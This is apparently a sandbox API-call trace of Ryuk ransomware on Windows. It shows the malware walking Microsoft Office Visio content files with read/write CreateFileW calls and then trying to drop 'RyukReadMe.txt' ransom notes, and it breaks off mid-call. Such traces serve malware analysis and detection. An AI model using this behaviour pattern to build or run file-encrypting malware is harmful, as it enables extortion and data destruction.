CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACD_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacd_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.012] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.012] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.012] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACD_U.VSS", dwFileAttributes=0x80) returned 0 [0138.012] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACD_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvacd_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.012] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.012] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.012] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.012] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACEQ_M.VSS", dwFileAttributes=0x80) returned 0 [0138.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACEQ_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvaceq_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.013] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.013] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.013] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.013] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACEQ_U.VSS", dwFileAttributes=0x80) returned 0 [0138.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVACEQ_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvaceq_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.013] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.013] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.013] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.013] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVAC_M.VST", dwFileAttributes=0x80) returned 0 [0138.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVAC_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvac_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.014] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.014] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.014] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.014] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVAC_U.VST", dwFileAttributes=0x80) returned 0 [0138.014] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\HVAC_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\hvac_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.014] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.014] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.015] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.015] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.015] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_M.VSS", dwFileAttributes=0x80) returned 0 [0138.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\idef0_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.015] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.015] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.016] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_M.VST", dwFileAttributes=0x80) returned 0 [0138.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\idef0_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.016] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.016] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.016] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.016] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_U.VSS", dwFileAttributes=0x80) returned 0 [0138.016] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\idef0_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.016] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.017] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.017] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.017] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_U.VST", dwFileAttributes=0x80) returned 0 [0138.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IDEF0_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\idef0_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.017] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.017] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.017] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.017] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.017] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\INTANN_M.VSS", dwFileAttributes=0x80) returned 0 [0138.017] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\INTANN_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\intann_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.018] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.018] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.018] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.018] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.018] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\INTANN_U.VSS", dwFileAttributes=0x80) returned 0 [0138.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\INTANN_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\intann_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.018] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.018] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.018] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.018] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.019] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IRRIG_M.VSS", dwFileAttributes=0x80) returned 0 [0138.020] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IRRIG_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\irrig_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.020] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.020] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.020] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.021] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.021] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IRRIG_U.VSS", dwFileAttributes=0x80) returned 0 [0138.021] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\IRRIG_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\irrig_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.021] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.021] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.021] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.021] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_M.VSS", dwFileAttributes=0x80) returned 0 [0138.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\itil_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.022] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.022] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.022] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.022] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_M.VST", dwFileAttributes=0x80) returned 0 [0138.022] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\itil_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.022] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.022] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.023] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_U.VSS", dwFileAttributes=0x80) returned 0 [0138.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\itil_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.023] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.023] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.023] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.023] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_U.VST", dwFileAttributes=0x80) returned 0 [0138.023] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\ITIL_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\itil_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.023] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.024] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LANGLV_M.VSS", dwFileAttributes=0x80) returned 0 [0138.024] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LANGLV_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\langlv_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.024] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.024] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.024] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.024] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.024] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LANGLV_U.VSS", dwFileAttributes=0x80) returned 0 [0138.025] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LANGLV_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\langlv_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.025] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.025] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.025] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.025] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.025] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPDR_M.VST", dwFileAttributes=0x80) returned 0 [0138.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPDR_M.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ldapdr_m.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.026] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.026] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.026] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPDR_U.VST", dwFileAttributes=0x80) returned 0 [0138.026] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPDR_U.VST" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ldapdr_u.vst"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.026] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.026] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.026] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.026] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPOB_M.VSS", dwFileAttributes=0x80) returned 0 [0138.027] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPOB_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ldapob_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.027] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.027] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.027] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.027] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.027] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPOB_U.VSS", dwFileAttributes=0x80) returned 0 [0138.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LDAPOB_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ldapob_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.028] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.028] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.028] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.028] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LEGEND_M.VSS", dwFileAttributes=0x80) returned 0 [0138.028] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LEGEND_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\legend_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.028] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.028] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.029] FindNextFileW (in: hFindFile=0x3a2d60, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0138.029] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LEGEND_U.VSS", dwFileAttributes=0x80) returned 0 [0138.029] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LEGEND_U.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\legend_u.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.029] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.029] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.029] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0138.029] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LGND_M.VSS", dwFileAttributes=0x80) returned 0 [0138.030] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\LGND_M.VSS" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\lgnd_m.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.030] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.030] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0138.100] FindClose (in: hFindFile=0x3a2d60 | out: hFindFile=0x3a2d60) returned 1 [0138.101] SetLastError (dwErrCode=0x0) [0138.101] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\1033\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\1033\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.104] GetLastError () returned 0x5 [0138.104] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0138.104] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.104] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.104] SetLastError (dwErrCode=0x0) [0138.104] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\Visio Content\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\visio content\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0138.104] GetLastError () returned 0x5 [0138.104] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0138.104] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0138.106] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3a2d00 [0138.106] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0138.106] FindNextFileW (in: hFindFile=0x3a2d00, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0138.106] FindClose (in: hFindFile=0x3a2d00 | out: hFindFile=0x3a2d00) returned 1 [0138.106] SetLastError (dwErrCode=0x0) [0138.106] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\XLSTART\\RyukReadMe.txt" (normalized: "c:\\program files\\microsoft office\\office14\\xlstart\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, 